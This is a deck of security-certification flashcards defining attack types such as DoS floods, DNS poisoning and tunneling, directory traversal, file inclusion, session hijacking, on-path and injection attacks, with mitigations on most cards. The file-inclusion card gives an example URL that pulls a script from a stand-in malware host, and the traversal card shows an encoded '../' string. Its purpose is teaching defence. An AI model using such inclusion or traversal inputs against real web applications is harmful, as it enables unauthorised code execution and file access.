Malicious Activity Flashcards

Objective 2.4 - Page 267

1
Q

DoS (Denial of Service) Definition

A

Used to describe an attack that attempts to make a computer or server’s resources unavailable

2
Q

DDoS (Distributed Denial of Service) Variants

A

DoS, Amplified DDoS, Reflected DDoS

3
Q

DNS Attack Types

A
  • DNS Cache Poisoning
  • DNS Amplification
  • DNS Tunneling
  • Domain Hijacking
  • DNS Zone Transfer
4
Q

Directory Traversal Attacks

A

Exploiting insufficient security validation of user-supplied input file names

5
Q

Privilege Escalation Attack

A

Exploiting system vulnerability to gain elevated access

6
Q

Replay Attacks

A

Type of network-based attack where valid data transmissions are maliciously or fraudulently re-broadcast, repeated, or delayed
Involves intercepting data, analyzing it, and deciding whether to retransmit it later
Application - Email \ Online shopping \ social media

7
Q

Session Hijacking

A

Attacker takes over a user session to gain unauthorized access

8
Q

Replay Vs Session Hijacking

A
  • In a Session Hijack, the attacker alters real-time data transmission
  • In a Replay Attack, the attacker intercepts the data and then can decide later whether to retransmit the data
9
Q

Malicious Code Injection Attacks

A

Introduction of harmful code into a program or system

10
Q

Indicators of Compromise (IoC)
(Examples listed)

A

Account lockout
Concurrent session usage
Blocked content
Impossible travel
Resource consumption
Inaccessibility
Out-of-cycle logging
Published documents indicating hacking
Missing logs

11
Q

Ping Flood (Flood Attacks type)

A

Overloading a server with ICMP echo requests (pings)
Mitigation - often countered by blocking echo replies

12
Q

SYN Flood (Flood Attacks type)

A

Initiating multiple TCP sessions without completing the 3-way handshake, which consumes server resources and prevents legitimate connections
Mitigation \ Countermeasures
- Flood guard \ Timeout configurations \ Intrusion Prevention Systems

13
Q

Permanent Denial of Service (PDOS) Attack

A

Exploits security flaws to break a networking device permanently by re-flashing its firmware
Requires a full firmware reload to bring the device back online

14
Q

Fork Bomb

A

Attack creates a large number of processes, consuming processing power
Not considered a worm, as it doesn’t infect programs or use the network
Self-replicating nature causes a denial of service condition

15
Q

DNS Amplification

A

Specialized DDoS that allows an attacker to initiate DNS requests from a spoofed IP address to flood a website

16
Q

Surviving and Preventing DoS \ DDoS Attacks (page 270)

A
  • Black Hole or Sinkhole
  • IPS
  • Elastic Cloud Infrastructure
  • Specialized Cloud Service Providers
17
Q

Black Hole or Sinkhole (Surviving and Preventing DoS\DDoS)

A

Routes attacking IP traffic to a non-existent server through a null interface; an effective but temporary solution

18
Q

DNS Cache Poisoning (DNS Spoofing)

A

Corrupts a DNS resolver’s cache with false information and redirects users to malicious websites
Mitigation - Use DNSSEC (Domain Name System Security Extensions) to add digital signatures to DNS data
Mitigation - Implement secure network configurations and firewalls to protect DNS servers

19
Q

DNS Amplification Attacks

A

Overwhelms a target system with DNS response traffic by exploiting the DNS resolution process
Spoofed DNS queries sent to open DNS servers
Mitigation - Limit the size of DNS responses \ Rate limit DNS response traffic to reduce the impact

20
Q

DNS Tunneling

A

Encapsulates non-DNS traffic (e.g., HTTP, SSH) over port 53
Attempts to bypass firewall rules for command and control or data exfiltration
Mitigation - Monitor and analyze DNS logs for unusual patterns indicating tunneling

21
Q

Domain Hijacking (Domain Theft)

A

Unauthorized change of domain registration
May lead to loss of website control and redirection to malicious sites

22
Q

DNS Zone Transfer Attacks

A

Attempts to obtain an entire DNS zone data copy
Exposes sensitive information about a domain’s network infrastructure
Could be used for reconnaissance in future attacks

23
Q

Directory Traversal Attack

A
  • An injection attack occurs when the attacker inserts malicious code through an application interface
  • Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory
  • Attackers may use encoding to hide directory traversal attempts (%2e%2e%2f represents ../)
24
Q

File Inclusion

A

Web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor

25
Q

Remote File Inclusion

A

An attacker executes a script to inject a remote file into the web app or website
https://diontraining.com/login.php?user=http://malware.bad/malicious.php

26
Q

Arbitrary Code Execution

A

Vulnerability allows an attacker to run their code without restrictions

27
Q

Remote Code Execution

A

Type of arbitrary code execution that occurs remotely, often over the internet

28
Q

Rootkits

A

Class of malware that conceals its presence by modifying system files, often at the kernel level
Ring Zero - Kernel with highest privileges
Rings 1 to 3 - User-level components with decreasing privileges

29
Q

Session Management

A
  • Fundamental security component in web applications
  • Enables web applications to uniquely identify a user across a number of different actions and requests, while keeping the state of the data generated by the user and ensuring it is assigned to that user
30
Q

Cookie

A

Text file used to store information about a user when they visit a website
- Cookies must be protected because they contain client information that is being transmitted across the Internet

31
Q

Session Vs Persistent Cookies

A

Session - Non-persistent, reside in memory, and are deleted when the browser instance is closed
Persistent - Cookies that are stored in the browser cache until they are deleted by the user or pass a defined expiration date

32
Q

Session Hijacking

A
  • A type of spoofing attack where the attacker disconnects a host and then replaces it with his or her own machine, spoofing the original host’s IP address
  • Session hijacking attacks can occur through the theft or modification of cookies
33
Q

Session Prediction Attacks

A

Modifies the contents of a cookie after it has been generated and sent by the web service to the client’s browser so that the newly modified cookie can be used to exploit vulnerabilities in the web app

34
Q

On-Path Attack

A

An attack where the attacker positions their workstation logically between two hosts during communication
- The attacker transparently captures, monitors, and relays communications between those hosts

35
Q

Methods of On-Path Attacks

A

ARP Poisoning
DNS Poisoning
Rogue Wireless Access Point
Rogue Hub or Switch

36
Q

ARP Poisoning

A

Manipulating Address Resolution Protocol (ARP) tables to redirect network traffic

37
Q

DNS Poisoning

A

Altering DNS responses to reroute traffic

38
Q

Rogue Wireless Access Point

A

Creating a fake wireless access point to intercept traffic

39
Q

Rogue Hub or Switch

A

Introducing a malicious hub or switch to capture data on a wired network

40
Q

Relay Attack

A

The attacker becomes part of the conversation between two hosts
- Serves as a proxy and can read or modify communications between the hosts
- Any traffic between the client and server goes through the attacker

41
Q

SSL Stripping

A

An attack that tricks the encryption application into presenting an HTTP connection instead of HTTPS
- Enables attackers to capture unencrypted data when the user believes they are using a secure connection

42
Q

Downgrade Attack

A

An attacker forces a client or server to abandon a higher security mode in favor of a lower security mode

43
Q

Lightweight Directory Access Protocol (LDAP)

A

An open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network

44
Q

Injection Attacks

A

LDAP Injection
Command Injection
Process Injection

45
Q

LDAP Injection

A

An application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input
- Use input validation and input sanitization as protection against an LDAP injection attack

46
Q

Command Injection

A

Occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application

47
Q

Process Injection

A

Method of executing arbitrary code in the address space of a separate live process

48
Q

Indicators of Compromise (IoC)

A

Pieces of forensic data that identify potentially malicious activity on a network or system
- Serves as digital evidence that a security breach has occurred